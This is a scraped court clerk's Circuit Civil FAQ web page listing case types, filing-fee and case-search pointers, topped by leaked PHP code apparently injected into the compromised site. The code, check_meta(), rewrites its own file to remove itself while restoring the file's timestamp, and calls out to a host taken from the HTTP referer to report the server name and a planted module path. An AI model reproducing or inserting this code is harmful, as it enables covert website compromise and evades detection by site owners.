check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Circuit Civil FAQ's
Home Circuit Civil FAQ's

More... Quick Links

Circuit Civil Frequently Asked Questions
  Toggle all descriptions Collapse all descriptions
Frequently Asked Questions (Click to sort)
What is a Civil Action?

The types of cases filed in the Circuit Civil Division are:

  • Professional Malpractice
  • Products Liability
  • Auto Negligence
  • Negligence Action
  • Condominium Action
  • Contract Indebtedness
  • Real Property Mortgage Foreclosure
  • Eminent Domain
  • Appeal (County Court)
How do I file a Civil Action (over $15,000)?

The Clerk's Office cannot give legal advice. Please consult your attorney.

What are the filing fees for the Circuit Civil Division?

Click here for the current listing of filing fees.

How do I search for a Civil case?

Click on Online Inquiry System at the top of the navigation bar to the left of this page.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.